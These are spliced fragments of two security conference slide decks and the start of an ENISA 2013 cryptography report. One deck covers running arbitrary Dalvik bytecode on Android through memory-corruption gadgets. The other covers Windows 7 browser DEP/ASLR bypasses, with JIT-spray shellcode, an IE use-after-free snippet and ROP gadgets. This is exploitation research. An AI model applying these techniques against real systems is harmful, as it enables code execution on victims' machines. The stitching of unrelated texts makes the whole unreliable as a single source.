–Various optimizations (CPU -wise)  
•Our Dex is not an ODex  file 
–CLASS_ISOPTIMIZED|CLASS_ISPREVERIFIED  
–Well, thanks, eh?  
•libdex  doesn’t verify Dex vs ODex  
–To be continued.  
 
Now what?  
We can mark a class “verified & optimized”  
•DexOpt  will then.. set a status field:  
 
 
•Followed by a check:  
 
 
Abuse ALL the Dalvik  
•We can now write not -so-strict Dalvik  
–For all methods of a particular class  
–No verification  
–Just set the class’ access_flags  
•Possibilities in Dalvik  
–Write “special” sequences of instructions  
•Normally rejected during validation    
–Use instructions available for ODex  
•Optimized instructions  
 
 
Goal: Run arbitrary Dalvik  
•Input: Raw Dalvik  Bytecode  
–Most Dalvik  instructions take {1..5} ushort’s  
–Use a string with unicode  “characters” ( Bytecode ) 
•Each character represented as UTF -16 “code point”  
•UTF-16 code points are 16 -bits – like an ushort  
•Task: Redirect Dalvik’s  Program Counter  
–To the string with our Bytecode  
•Output: The return value  
–After executing our raw Dalvik  Bytecode   
 
 
Some Gadgets  
We’re going to require some basic stuff  
•Object address leak  
–What is the address of our Object?  
•Read  arbitrary integer  
–What is the value at this address?  
•Write  arbitrary integer  
–Your address now contains my value!  
 
 
Gadgets: Object Address Leak  
Can simply cast an Object as integer  
(Now Type Checking is disabled ) 
 
// Invalid Java code, but closest estimation  
// to our Bytecode  
int address(Object obj) { 
    return ( int) obj; 
} 
 
Gadgets: Read Arbitrary Integer  
•We use the “ array -length ” instruction  
–Arrays, e.g., int[] foo = new int[42];  
–Arrays in Dalvik  have their length at offset +8 
•Our read_int32 function  
–Subtract 8 from the address  
–Perform “array -length” on our address  
–Return the “length ” 
Gadgets: Write Arbitrary Integer  
•Usage of “ iput-quick” instruction  
–iput = Instance Put, set a field of an instance object  
–E.g., this.foo  = bar;  
–v0 = bar, v1 = this   
–iput v0, v1, SomeClass ;->foo:I  
•Quick  is the ODex  version  
–iput-quick v0, v1, #+4 
–#+4 is the offset of field foo from this 
–Can overwrite any “field” with iput-quick  
Strings in Java  
•String is a wrapper around char[]  
–*(u32 *)( str + 8) = pointer to char[]  
–(u16 *)(char[] + 16) = UTF -16 code points  
•E.g., given string “Hack.lu \u1337”  
–UTF-16 code points will look like:  
 
 
Executing Arbitrary Dalvik  
•We want to execute our Dalvik  String  
•Override the address of a virtual function  
•Class layout:  
–*(u32 *)( this + 0) = clazz  object  
–*(u32 *)( clazz  + 112) = vtable_count  
–*(u32 *)( clazz  + 116) = vtable_pointer  
•All classes inherit java.lang.Object  
–Which defines a couple of virtual methods itself  
•We create a custom class with 1 virtual method  
–Our virtual method is located at index vtable_count -1 
Executing Arbitrary Dalvik  
•vtable : pointers to Method  instances  
•vm/mterp /armv5te/ footer.S : 
 
 
•vm/mterp /common/ asm-constants.h : 
 
 
•Pointer to Dalvik  Bytecode  at offset 32  

Quick Pwn  Summary  
•Get an arbitrary String  
–Locate its UTF -16 code points (our Bytecode ) 
•Create Object of a Class with a virtual method  
–Get last vtable  entry  
–Overwrite Insns  with the address to our Bytecode  
•Call the virtual method:  
–v0 = object instance  
–invoke -virtual {v0}, SomeClass ;->dummy_method  
 
Demo o’clock  
•Our Bytecode  should return gracefully  
–(It’s too easy to crash the emulator at this point..)  
–We can even get its return value  
•Made a simple Application  
–With a textbox, waiting for Bytecode  
–A fancy button  
–Shows the return value of the executed Bytecode  
•Represented as integer below the button  
Demo Time  
Bytecode  Examples  
$ py dalvik.py ‘ 0013 0539 000f ’ 
0 const/16 v0, #0x539 
2 return v0 
 
$ py dalvik.py ‘ 0013 0539 00d8 0300 000f ’ 
0 const/16 v0, #0x539 
2 add-int/lit8 v0, v0, #+3 
4 return v0  
Real usage?  
•We can put any Bytecode  we want  
–Including invalid Bytecode  (just don’t invoke it)  
–Breaks commonly used tools, big time  
•Exercise for the reader  
•We can run arbitrary Dalvik  Bytecode  
–No need to hardcode all our proprietary code  
–Prevent easy analysis of your Application  
•Because decompiling “normal” Dalvik  into Java is damn easy  
 
Future Work  
Native Code Execution  
•(Directly from within Dalvik , naturally)  
•Definitely possible, but requires some work..  
•Need to allocate RWX memory or use ROP  
–Will probably want to parse / proc /self/maps  
–Locate mmap () or mprotect () 
•Set ACC_STATIC  in access_flags  for virtual 
method  
–Allows to jump to arbitrary ARMv7 code  
Future Work  
•Self-decrypting Dalvik  Bytecode  
–Don’t run the entire Dalvik  string right away  
–Pass only chunks – mutate parts on -the-go 
–Whatever you can think of..?  
•Obfuscate the memory corruption gadgets  
–Right now it’s pretty obvious..  
•Exploit other built -in classes & features  
•Modify the Dalvik  VM itself  
–Facebook “extended” the Dalvik  VM for >64k methods  
(invoke -* instructions normally take a 16 -bit index.)  
 
 
For fun: execute -inline  
•Optimizations of a few dozen functions, e.g.:  
 
 
•execute -inline {v0, v1, v2}, 42@inline  
•Doesn’t do bounds checking  
•Table is close to GOT  
–Exposes some functions, e.g., memcpy , mmap  :p 
 
 
For Fun: invoke -super -quick  
•Invokes the super  method for a virtual method  
•Takes a bit more time to setup  
–Create a class A with a virtual method  
–Create a class B which inherits class A 
–Overwrite Insns  address for A’s virtual method  
–Call A’s virtual method from B’s with super  
•More awesome  
–Doesn’t invoke a virtual  method  
–Invokes a super quick  method  
Patch by Ben Gruver ( JesusFreke ) 
(PoC still works on Android 4.3?!)  
 

The End.  

The Real End  
Thanks to: Alexandre  Dulaunoy , Patrick Schulz, Rodrigo Chiossi , 
Sergey Bratus , Valentin  Pistol, ShiftReduce , Thomas Schreck , 
Peter Geissler , Eindbazen  CTF Team  
Jurriaan  Bremer  
me@jbremer.org  
@skier_t  Defeat windows 7 browser 
memory protection  
Chen XiaoBo  
Xiao_Chen@McAfee.com  
Xie Jun  
Jun_Xie@McAfee.com  
 
Windows protection review  
•GS 
–Stack cookies prevents overwrite EIP  
–Can be defeated by overwrite SEH chains  
 
•SafeSEH & SEHOP  
–SEH handler validation  
–Can be defeated by overwrite by register SEH handler or DLL without SafeSEH  
•Case DNS  RPC buffer overflow  
–SEH chain validation  
 
•Heap Protection  
–Safe unlinking  
–Heap cookies  
–Heap metadata encryption  
–Safe LAL (Lookaside lists)  
–Most protection are added in vista / 2008 / win7  
–Lookaside overwrite technique still works on XP/2003  
 
Windows protection review  
•DEP 
–NX support  
–Permanent DEP  
•IE 8 DEP is permanent  
•NtSetProcessInformation() technique no longer working  
–Ret-to-libc or ROP (Return -Oriented Programming ) shellcode can be use to 
defeat the DEP  
 
•ASLR  
–Address space layout randomization  
–Images / stack / heap / PEB / TEB  
–Prevent ret -to-libc attacks  
 
Windows protection review  
•Brute force  
–Guess the base DLL address via IE  
–Not a good way  
 
•Information leak  
–Currently No general way to do that remotely  
–Probably it’s need another 0day  
 
Exploitation technique overview  
•Brower memory protection bypasses  
–By Alexander Sotirov & Mark Dowd  
–Flash  
•Flash also got ASLR now  
–Java  
•Java allocates RWX memory  
•But is allocated inside java.exe process now  
–.NET user control  
•The easily way to bypass ASLR & DEP in the past  
• But now IE 8 blocks .NET user control from internet zone  
 
 
Public exploitation technique  
•Flash JIT  
–By Dion Blazakis at BlackHat DC 2010  
–Spray heap with executable memory  
•Bypass DEP & ASLR  
–It’s can be done by load multiple SWF files into IE process  
•The address goes to a stable location  
–JIT code was encrypted in Flash 10.1  
 
Public exploitation technique  
•Flash JIT  
–Write shellcode in ActionScript way  
•Use long XOR expression  
•XOR instruction only one byte (0x35)  
•0x3c with XOR EAX opcode 0x35 can be merge to a nope -like instrucation.  
–CMP AL, 0x35  
•Our idea is call NtAllocateVirtualMemory()/VirtualAlloc() in AS shellcode  
–Allocates memory with PAGE_EXECUTE_READWRITE flag  
–Copy the real shellcode and jump to execute  
 
Public exploitation technique  
•Flash JIT  
–Example of push NtAllocateVirtualMemory() arguments  
•3589e5eb01      xor     eax,1EBE589h  
•3583ec103c      xor     eax,3C10EC83h  
•356a40eb01      xor     eax,1EB406Ah  
•3531c0eb01      xor     eax,1EBC031h  
•35b410eb01      xor     eax,1EB10B4h  
•355031db3c      xor     eax,3CDB3150h  
•35b740eb01      xor     eax,1EB40B7h  
•35895d043c      xor     eax,3C045D89h  
•358d5d043c      xor     eax,3C045D8Dh  
•355331db3c      xor     eax,3CDB3153h  
•356a00eb01      xor     eax,1EB006Ah  
•35895d083c      xor     eax,3C085D89h  
•358d5d083c      xor     eax,3C085D8Dh  
•35536aff3c        xor     eax,3CFF6A53h  
•356a00eb01      xor     eax,1EB006Ah  
 
Public exploitation technique  
•Flash JIT  
–Execute from address + 1 become significant code  
–Feel painful to write shellcode in ActionScript ? 
–Now we have shellcode2as.exe   
–Automatic convert shellcode into ActionScript  
 
Case study #1  
•Flash JIT with IE aurora on windows 7  
–IE aurora  
•use-after-free vulns  
•Widely seen in the browser’s JS/DOM implement  
–Root Cause  
•EVENTPARAM reference CTreeNode without AddRef()  
•CTreeNode has been freed due element.innerHTML property  
•Cause dangling pointer issue when access event object srcElement or toElement  
 
Case study #1  
•Flash JIT with IE aurora on windows 7  
–Reuse the object  
•Get allocated size of CTreeNode  
–IE 7: 0x34  
–IE 8: 0x4c  
•Allocate same size in HTML to reuse the object  
–Go exploit it  
 
Case study #1  
•Flash JIT with IE aurora on windows 7  
– var reuse_object = new Array();  
– for(var x=0;x<9200;x++) {  
–  reuse_object.push(document.createElement("img"));  
– } 
– for (var x=0; x < 0x4c/4; i ++)  
–  var string_data = unescape("%u3344%u1122");  
 
–  
– for(var x=0; x < reuse_object.length; x++) {  
–  reuse_object[x].src = string_data;  
– } 
 
Case study #1  
•Flash JIT Demo on windows 7  
 
New exploitation technique  
•3rd Party IE plugin on windows 7  
–JRE without ASLR  
–jp2ssv.dll is loaded by default  
–If you wants load more JRE DLLs  
–Just embed Java applet in webpage  
•<applet code=“some.class“></applet>  
 
New exploitation technique  
•3rd Party IE plugin on windows 7  
–Bonjour for iTunes / QT  
–Adobe Shockwave  (dirapi.dll)  
•Assured Exploitation (cansecwest)  
•DEP in depth (syscan 2010)  
–This DLL without ASLR and loaded by default  
 
 
New exploitation technique  
•3rd Party IE plugin on windows 7  
–Find useful instructions in JRE  
–Find instruction which make ESP point to your data  
•LEA ESP, [REG] RET  
•LEA  ESP, [REG + XX] RET  
•PUSH REG POP ESP RET  
•XCHG REG, ESP RET  
•XCHG ESP, REG RET  
•MOV ESP, REG RET  
•MOV REG, FS:[0] RET  
•More combinations: CALL [REG + ???] and XCHG REG, ESP RET  
•... 
–Write ROP shellcode to get control  
 
 
New exploitation technique  
•3rd Party IE plugin on windows 7  
–Make your code memory RWX  
–The easiest way probably is call VirtualProtect() to make memory RWX  
–WriteProcessMemory()  
•Invoke NTWriteProcessMemory()  
•Can be use to write code to a read only & executable pages bypass memory  
–Allocate RWX memory and copy shellcode into & execute  
•Adobe TIFF exploit  
 
 
New exploitation technique  
•3rd Party IE plugin on windows 7  
–A example of control ESP in mdnsNSP.dll  
•mdnsNSP!DllUnregisterServer+0x7b:  
•1608114b 94              xchg    eax,esp  
•1608114c 0100            add     dword ptr [eax],eax  
•1608114e 00c3            add     bl,al  
•16081150 b826270000      mov     eax,2726h  
•16081155 c21400          ret     14h  
 
 
Case study #2  
•IE aurora exploit with JRE on windows 7  
–ESP code in JRE  
•awt!Java_sun_java2d_loops_DrawRect_DrawRect+0x6de:  
•6d005f6e 94              xchg    eax,esp  
•6d005f6f c3              ret  
 
•jp2iexp!DllGetClassObject+0x1496:  
•6d417e6c 94              xchg    eax,esp  
•6d417e6d c3              ret  
 
 
Case study #2  
•IE aurora exploit with JRE on windows 7  
–Putting data in the HeapSpray (done with Javascript)  
•ROP and the real shellcode  
•Make perfect heap allocations to avoid align issues.  
 
 
Case study #2  
•IE aurora exploit with JRE on windows 7  
–Call [VirtualProtect]  in jvm.dll  
•jvm!JVM_FindSignal+0x5732b:  
•6d97c9cb ff1588d09f6d    call    dword ptr [jvm!JVM_FindSignal+0xd79e8 (6d9fd088)]  
•6d97c9d1 f7d8            neg     eax  
•6d97c9d3 1bc0            sbb     eax,eax  
•6d97c9d5 f7d8            neg     eax  
•6d97c9d7 5f              pop     edi  
•6d97c9d8 5e              pop     esi  
•6d97c9d9 5d              pop     ebp  
•6d97c9da c3              ret  
–Return to VirtualProtect(mem, 0x2000, 0x40, ptr) to make Heap RWX  
 
 
Case study #2  
•IE aurora Java ROP demo on windows 7  
 
 
New exploitation technique  
•.NET Framework on windows 7  
–IE 8 did block .Net control from internet zone  
–You can not make IE load your exploit.dll  
–Unless you have other vuln to jump to trusted zone  
 
 
New exploitation technique  
•.NET Framework on windows 7  
–But now it’s not a problem  
–Windows 7 using .NET framework from 1.0 – 3.5 
–V1.0 – v2.0 still compiled with OLD compiler  
–Most DLLs are not with ASLR !!  
 
 
New exploitation technique  
•.NET Framework on windows 7  
–Using .NET user control which compiled with 2.0 C# compiler  
–Froce IE to load old version .NET DLLs !!  
–Example:  
•Even your .NET user control has been blocked  
•But it still will load .NET IE mime filter DLL into IE process  
 
 
New exploitation technique  
•.NET Framework on windows 7  
–ModLoad : 63f00000 63f0c000   
C:\Windows \Microsoft.NET \Framework \v2.0.50727 \mscorie.dll  
 
–This DLL is without ASLR !!  
 
 
New exploitation technique  
•IE aurora exploit with .NET Framework on windows 7  
–Control the ESP  
•mscorie!DllGetClassObjectInternal+0x3452:  
•63f0575b 94              xchg    eax,esp  
•63f0575c 8b00            mov     eax,dword ptr [eax]  
•63f0575e 890424          mov     dword ptr [esp],eax  
•63f05761 c3              ret  
 
 
New exploitation technique  
•IE aurora exploit with .NET Framework on windows 7  
–Return to VirtualProtect() make Heap RWX  
•mscorie!DllGetClassObjectInternal+0x29e2:  
•63f04ceb 55              push    ebp  
•63f04cec 8bec            mov     ebp,esp  
•63f04cee ff7518          push    dword ptr [ebp+18h]  
•63f04cf1 ff7514          push    dword ptr [ebp+14h]  
•63f04cf4 ff7510          push    dword ptr [ebp+10h]  
•63f04cf7 ff750c          push    dword ptr [ebp+0Ch]  
•63f04cfa ff150011f063    call    dword ptr [mscorie+0x1100 (63f01100)] (VirtualProtect)  
 
 
Case study #3  
•IE aurora .NET ROP demo on windows 7  
 
 
New exploitation technique  
•SystemCall On Windows  
– 0:007> dt _KUSER_SHARED_DATA 0x7ffe0000  
       ntdll!_KUSER_SHARED_DATA  
       ... 
        +0x300 SystemCall       : 0x772864f0  
        +0x304 SystemCallReturn : 0x772864f4  
        0:007> u 772864f0  
        ntdll!KiFastSystemCall:  
        772864f0 8bd4            mov     edx,esp  
        772864f2 0f34            sysenter  
        ntdll!KiFastSystemCallRet:  
 
 
–SystemCall pointer Adress 0x7ffe0300 not ASLR !!  
 
 
New exploitation technique  
•SystemCall On Windows  
–Windows user -mode enter to Kernel -mode like this  
– 0:019> u   ZwCreateProcess  
      ntdll!NtCreateProcess:  
      77284ae0 b84f000000      mov     eax,4Fh  
      77284ae5 ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)  
      77284aea ff12                  call    dword ptr [edx]  
      77284aec c22000            ret     20h  
 
 
–We can construct shellcode like a System Call manually  
–Using SystemCall can bypass DEP and ALSR  
 
 
Case study #4  
•IE MS08 -078 exploit with SystemCall on windows  
–Use heap spray fill the SystemCall address mapping in memory  
–Exploit the vulnerability success address  in our mapped SystemCall address  
•.text:461E3D30                  mov     eax, [esi] //eax==0x0a0a11c8  
....                                                                 // 0x11c8 be a systemcall ID  
.text:461E3D4C                  mov     ecx, [eax] //[0x0a0a11c8]==0x7ffe027c  
.text:461E3D4E                  push     edi 
.text:461E3D4F                  push     eax //eax==0x0a0a11c8  
.text:461E3D50                  call    dword ptr [ecx+84h] //call [0x7FFE0300] SystemCall  
•The same as NtUserLockWorkStation Service Call  
                 
                          mov     eax,11c8h  
                          mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)  
                          call    dword ptr [edx]  
 
 
Case study #4  
•System call on x64  
–7ffe0300 do not hold KiFastSystemCall anymore  
–Instead of  call    dword ptr fs:[0C0h]  
•0:000> u NtQueryInformationToken  
•ntdll!NtQueryInformationToken:  
•77d9fb38 b81e000000      mov     eax,1Eh  
•77d9fb3d 33c9            xor     ecx,ecx  
•77d9fb3f 8d542404        lea     edx,[esp+4]  
•77d9fb43 64ff15c0000000  call    dword ptr fs:[0C0h]  
•77d9fb4a 83c404          add     esp,4  
•77d9fb4d c21400          ret     14h  
The End  
•Now we know at least 4 ways to bypass ASLR & DEP  
 
 
Thanks  
 
 
Q&A   
 
 
www.enisa.europa.eu   
  
Algorithm s, Key Size s and 
Parameters  Report  
2013 r ecommendations  
version  1.0 – Octob er 2013 

Algorithms, Key Size and Parameters Report – 2013 Recommendations
Contributors to this report:
This work was commissioned by ENISA under contract P/18/12/TCD Lot 2 to the consortium
formed for this work by K.U.Leuven (BE) and University of Bristol (UK).
•Contributors: Nigel P. Smart (University of Bristol), Vincent Rijmen (K.U. Leuven), Bogdan
Warinschi (University of Bristol), Gaven Watson (University of Bristol).
•Editor: Nigel P. Smart (University of Bristol),
•ENISA Project Manager: Rodica Tirtea
Agreements of Acknowledgements
We would like to extend our gratitude to:
•External Reviewers: Arjen Lenstra (EPFL), Christof Paar (Ruhr-Universit ̈ at Bochum), Ken-
neth G. Paterson (Royal Holloway, University of London), Michael Ward (Mastercard) for
their comments suggestions and feedback.
•We also thank a number of people for providing anonymous input.
Page: 1
Algorithms, Key Size and Parameters Report – 2013 Recommendations
About ENISA
The European Union Agency for Network and Information Security Agency is a centre of network
and information security expertise for the EU, its member states, the private sector and Europe’s
citizens. ENISA works with these groups to develop advice and recommendations on good practice
in information security. It assists EU member states in implementing relevant EU legislation and
works to improve the resilience of Europe’s critical information infrastructure and networks. ENISA
seeks to enhance existing expertise in EU member states by supporting the development of cross-
border communities committed to improving network and information security throughout the EU.
More information about ENISA and its work can be found at www.enisa.europa.eu.
Contact details
For contacting ENISA or for general enquiries on cryptography, please use the following details:
•E-mail: sta@enisa.europa.eu .
•Internet: http://www.enisa.europa.eu .
For questions related to current report, please use the following details:
•E-mail: sta@enisa.europa.eu
Legal Notice
Notice must be taken that this publication represents the views and interpretations of the authors
and editors, unless stated otherwise. This publication should not be construed to be a legal ac-
tion of ENISA or the ENISA bodies unless adopted pursuant to the ENISA Regulation (EU) No
526/2013. This publication does not necessarily represent state-of the-art and ENISA may update
it from time to time.
Third-party sources are quoted as appropriate. ENISA is not responsible for the content of the
external sources including external websites referenced in this publication.
This publication is intended for information purposes only. It must be accessible free of charge.
Neither ENISA nor any person acting on its behalf is responsible for the use that might be made
of the information contained in this publication.
Reproduction is authorised provided the source is acknowledged. c⃝European Union Agency for
Network and Information Security (ENISA), 2013
Page: 2
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Contents
1 Executive Summary 9
2 How to Read this Document 11
2.1 Division into Chapters and Sections . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2.2 Making a Decision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
2.2.1 Public key signatures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
2.2.2 Public key encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
2.3 Comparison to Other Documents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
2.4 Open Issues and Areas Not Covered . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
3 Primitives 20
3.1 Comparison . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
3.2 Block Ciphers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
3.2.1 Recommended Block Ciphers . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
3.2.2 Legacy Block Ciphers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
3.2.3 Historical (not-recommended) Block Ciphers . . . . . . . . . . . . . . . . . . 25
3.3 Hash Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
3.3.1 Recommended Hash Functions . . . . . . . . . . . . . . . . . . . . . . . . . . 26
3.3.2 Legacy Hash Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
3.3.3 Historical (not recommended) Hash Functions . . . . . . . . . . . . . . . . . . 27
3.4 Stream Ciphers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
3.4.1 Recommended Stream Ciphers . . . . . . . . . . . . . . . . . . . . . . . . . . 27
3.4.2 Legacy Stream Ciphers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
3.4.3 Historical (non recommended) Stream Ciphers . . . . . . . . . . . . . . . . . 29
3.5 Public Key Primitives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
3.5.1 Factoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
3.5.2 Discrete Logarithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
3.5.3 Pairings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
3.6 Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
Page: 3
Algorithms, Key Size and Parameters Report – 2013 Recommendations
4 Schemes 36
4.1 Block Cipher Basic Modes of Operation . . . . . . . . . . . . . . . . . . . . . . . . . 37
4.1.1 ECB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
4.1.2 CBC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
4.1.3 OFB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
4.1.4 CFB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
4.1.5 CTR . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
4.1.6 XTS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
4.1.7 EME . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
4.2 Message Authentication Codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
4.2.1 Block Cipher Based MACs . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
4.2.2 GMAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.2.3 Hash Function Based MACs . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.3 Authenticated Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
4.3.1 Encrypt-then-MAC (and variants) . . . . . . . . . . . . . . . . . . . . . . . . 44
4.3.2 OCB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
4.3.3 CCM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
4.3.4 EAX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
4.3.5 CWC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
4.3.6 GCM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
4.4 Key Derivation Functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
4.4.1 NIST-800-108-KDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
4.4.2 X9.63-KDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
4.4.3 NIST-800-56-KDFs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
4.4.4 IKE-v1-KDF and IKE-v2-KDF . . . . . . . . . . . . . . . . . . . . . . . . . . 47
4.4.5 TLS-KDF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
4.5 Generalities on Public Key Schemes . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
4.6 Public Key Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
4.6.1 RSA-PKCS# 1 v1.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
4.6.2 RSA-OAEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
4.7 Hybrid Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
4.7.1 RSA-KEM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.7.2 PSEC-KEM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.7.3 ECIES-KEM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.8 Public Key Signatures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.8.1 RSA-PKCS# 1 v1.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.8.2 RSA-PSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
4.8.3 RSA-FDH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
4.8.4 ISO 9796-2 RSA Based Mechanisms . . . . . . . . . . . . . . . . . . . . . . . 50
4.8.5 (EC)DSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Page: 4
Algorithms, Key Size and Parameters Report – 2013 Recommendations
4.8.6 PV Signatures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
4.8.7 (EC)Schnorr . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
4.9 Identity Based Encryption/KEMs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
4.9.1 BF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
4.9.2 BB . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
4.9.3 SK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
5 Protocols 53
5.1 General Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
5.1.1 Key Agreement . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
5.1.2 TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
5.1.3 IPsec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
5.1.4 SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
5.1.5 Kerberos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
5.2 Application Specific Protocols . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
5.2.1 WEP/WPA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
5.2.2 UMTS/LTE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
5.2.3 Bluetooth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
5.2.4 ZigBee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
5.2.5 EMV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Bibliography 64
Page: 5
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Acronyms
3DES Triple DES
3GPP 3rd Generation Partnership Project (mobile phone system)
A5/X Stream ciphers used in mobile phone protocols
AES Advanced Encryption Standard
AMAC Ansi Retail MAC
BB Boneh–Boyen (ID based encryption)
BF Boneh–Franklin (ID based encryption)
CBC Cipher Block Chaining (mode)
CCA Chosen Ciphertext Attack
CCM Counter with CBC-MAC (mode)
CFB Cipher Feedback
CMA Chosen Message Attack
CMAC Cipher-based MAC
CPA Chosen Plaintext Attack
CTR Counter (mode)
CVA Ciphertext Validity Attack
CWC Carter–Wegman + Counter
DEM Data Encapsulation Mechanism
DES Data Encryption Standard
DLP Discrete Logarithm Problem
DSA Digital Signature Algorithm
E0 A stream cipher used in Bluetooth
EAX Actually stands for nothing (mode)
ECB Electronic Code Book (mode)
ECC Elliptic Curve Cryptography
ECDLP Elliptic Curve Discrete Logarithm Problem
ECIES Elliptic Curve Integrated Encryption Scheme
EEA EPS Encryption Algorithm
EIA EPS Integrity Algorithm
EMAC Encrypted CBC-MAC
Page: 6
Algorithms, Key Size and Parameters Report – 2013 Recommendations
EME ECB-mask-ECB (mode)
EMV Europay–Mastercard–Visa (chip-and-pin system)
ENISA European Network and Information Security Agency
FDH Full Domain Hash
GCM Galois Counter Mode
GDSA German Digital Signature Algorithm
GSM Groupe Sp ́ ecial Mobile (mobile phone system)
HMAC A hash based MAC algorithm
IAPM Integrity Aware Parallelizable Mode
IEC International Electrotechnical Commission
IEEE Institute of Electrical and Electronics Engineers
IETF Internet Engineering Task Force
IKE Internet Key Exchange
IND Indistinguishability of Encryptions
INT-CTXT Integrity of Ciphertexts
IPsec Internet Protocol Security
ISO International Standards Organization
IV Initialisation Vector (or Value)
KDSA Korean Digital Signature Algorithm
KDF Key Derivation Function
KEM Key Encapsulation Mechanism
LTE Long Term Evolution (mobile phone system)
MAC Message Authentication Code
MOV Menezes–Okamoto–Vanstone (attack)
MQV Menezes–Qu–Vanstone (protocol)
NIST National Institute of Standards and Technology (US)
NMAC Nested MAC
OAEP Optimal Asymmetric Encryption Padding
OCB Offset Code Book (mode)
OFB Output Feedback (mode)
Page: 7
Algorithms, Key Size and Parameters Report – 2013 Recommendations
PKCS Public Key Cryptography Standards
PRF Pseudo Random Function
PRP Pseudo Random Permutation
PSEC Provable Secure Elliptic Curve (encryption)
PSS Probabilistic Signature Scheme
PV Pointcheval–Vaudenay (signatures)
RC4 Ron’s Cipher Four (a stream cipher)
RDSA Russian Digital Signature Algorithm
RSA Rivest–Shamir–Adleman
SHA Secure Hash Algorithm
